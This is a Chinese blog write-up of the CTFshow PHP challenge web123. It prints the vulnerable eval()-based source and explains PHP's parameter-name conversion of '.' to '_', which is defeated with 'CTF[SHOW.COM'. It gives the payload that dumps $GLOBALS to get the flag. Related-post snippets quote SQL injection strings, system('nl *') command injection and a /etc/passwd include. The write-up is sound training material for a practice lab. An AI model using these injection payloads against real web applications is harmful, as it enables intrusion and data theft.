CTFshow php特性 web123

最新推荐文章于 2024-07-16 16:27:37 发布
最新推荐文章于 2024-07-16 16:27:37 发布
阅读量307 收藏
点赞数
分类专栏: CTFshow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/121973698
版权

php 开发语言 后端

目录

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
$a=$_SERVER['argv'];
$c=$_POST['fun'];
if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\%|\^|\*|\-|\+|\=|\{|\}|\"|\'|\,|\.|\;|\?/", $c)&&$c<=18){
         eval("$c".";");  
         if($fl0g==="flag_give_me"){
             echo $flag;
         }
    }
}
?>

思路

限制不是很多,发现刚开始发现一直没有回显,在本地测试了一下
发现 . 被替换成了 下划线

好家伙,难怪过不去
在这里插入图片描述
直接跑bp, 把_ 和 . 替换成特殊符号

在这里插入图片描述
正确绕法 CTF[SHOW.COM
在这里插入图片描述

题解

试试var_export($GLOBALS)
在这里插入图片描述

CTF_SHOW=&CTF[SHOW.COM=&fun=var_export($GLOBALS)

总结

水题

Kradress
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFShow web入门123-150 (php特性(二))
lonmar的博客
12-05 4925
CTFSHOW PHP特性web123-150
CTFSHOW WEB题目
qq_45655564的博客
08-09 2895
web签到题 网页原代码中发现这个,base64解码就是flag web2 这道题目就是最简单的SQL注入了 发现万能密码可以成功。 于是后台查询语句猜测是select ‘column’ from ‘table’ where username=’$_POST[]’&password=’$_POST[]’ limit 1,1 自己猜的熬,不一定是完全正确的。 这样的话直接闭合前面的单引号就行了。 之后就是 123’ or 1=1 union select 1,2,3# 123’ or 1=1 un
ctfshow-web入门-php特性web123web125、web126)
最新发布
Welcome To Myon'Blog !
07-16 1219
post 传入 CTF_SHOW 和 CTF_SHOW.COM 确保 isset($_POST['CTF_SHOW']) && isset($_POST['CTF_SHOW.COM']) 这部分条件为真,fun=eval($a[0]) 将 eval($a[0]) 的代码传递给 $c。最后 判断 if($fl0g === "flag_give_me"),因为 $fl0g 被正确地设置为了 'flag_give_me',所以这个条件为真,因此,echo $flag;
ctfshow web123-127
akxnxbshai的博客
02-08 3206
目录 Web 123 Web 125 Web 126 Web 127 Web 123 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ct
ctfshow--web入门(web101--web115&web123&web125-web133)
qing_chuan_的博客
06-08 1040
v2$v3反射,通俗来讲就是可以通过一个对象来获取所属类的具体内容,php中内置了强大的反射API:ReflectionClass:一个反射类,功能十分强大,内置了各种获取类信息的方法,创建方式为new ReflectionClass(str 类名),可以用echo new ReflectionClass(‘className’)打印类的信息。ReflectionObject:另一个反射类,创建方式为new ReflectionObject(对象名)。
ctfshow php特性 web89-web115 web123-150wp
mumuzi的博客
02-01 4831
皮爱吃皮特性
ctfshow web入门 php特性 web123--web139
2301_81040377的博客
04-06 1045
web133一样的东西但是我们的grep被过滤了,所以得思考一下怎么才行,但是反斜杠引号什么的没过滤,就可以用来绕过。拼接一下ctfshow{25b598bc-5a5b-4baf-a23e-2c4e9dea9d8f}必须传CTF_SHOW,CTF_SHOW.COM 不能有fl0g。就可以绕过对**isset($fl0g)**的判断,用+代表空格。先点击左边的获得域名,然后传参之后再点击右边的刷新结果。他这里对这个就讲的特别详细了,我抄一下。然后我们就可以进行类似的构造。就用argv的方法来写。
CTFshow php特性 web101
Kradress的博客
12-14 787
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-22 00:26:48 # @link: https://ctfer.com */ highlight_file(__FILE__); include("ctfshow.php"); //fl
ctfshow php特性 web112
U_U520的博客
12-05 544
考点:php伪协议 绕过is_file+highlight_file 对于文件的检测 我们的目的是即不能让is_file检测出是文件,还要让 highlight_file可以识别为文件。这时候可以利用php伪协议。 可以直接用不带任何过滤器的filter伪协议 也可以用一些没有过滤掉的编码方式和转换方式 还有一些可以编码的,比如base64编码convert.base-encode64部分可以二次编码绕过(包含调用 时会解一次码)
CTFshow php特性 web108
Kradress的博客
12-15 286
目录源码思路ereg绕过flag题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-28 23:53:55 */ highlight_file(__FILE__); error_reporting(0); include("flag.php"); if
CTFshow php特性 web150
Kradress的博客
12-19 541
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-19 07:12:57 */ include("flag.php"); error_reporting(0); highlight_file(__FILE__); class CTFSHOW{
CTFshow php特性 web105
Kradress的博客
12-14 378
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-28 22:34:07 */ highlight_file(__FILE__); include('flag.php'); error_reporting(0); $error='你
CTFshow web 入门持续更新 冲冲冲
giaogiao123的博客
10-06 453
*1 命令执行篇 web29 很明显绕过就可以 上c=system(‘nl *’); web30 这里注意要绕过system 这就要用到echo函数 c=echo( nl *`); 同理web31过滤空格 用trb %09绕过 web32 这个题就比较骚了 过滤了echo system 空格 基本上上面的方法都没法用 那我们怎么去解题呢?? 首先尝试文件包含 include"/etc/passwd"?> 发现可以运行 这就说明可以运行的通,并且它没有过滤$ 还有一个问题include包含
ctfshow学习记录-web入门(php特性109-115&123&125-126)
龟速更新的九某人
07-19 1350
ctfshow学习记录-web入门(php特性web109-115&web123&web125-126)
CTFSHOW PHP特性篇(中篇 111-131)
羽的博客
10-21 4806
web111 function getFlag(&$v1,&$v2){ eval("$$v1 = &$$v2;"); var_dump($$v1); } if(isset($_GET['v1']) && isset($_GET['v2'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*
最全CTF Web题思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 5万+
个人向CTF Web题思路总结笔记
CTFshow命令执行29-123
qq_43534481的博客
08-06 1476
CTFshow命令执行WP
CTFshow刷题日记-WEB-PHP特性(下篇123-150)
Love&Share
09-05 3361
web123,125,126 error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){ if(!preg_match("/\\\\|\/|\~|\`
ctfshow php特性
08-06
引用提到了"ctfshow-php特性-超详解(干货)",它是一篇关于ctfshow php的博客文章。引用和引用则展示了两段关于ctfshow php特性的代码。其中引用是一段关于RCE(远程代码执行)的代码,而引用是一段关于反射类和命令...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值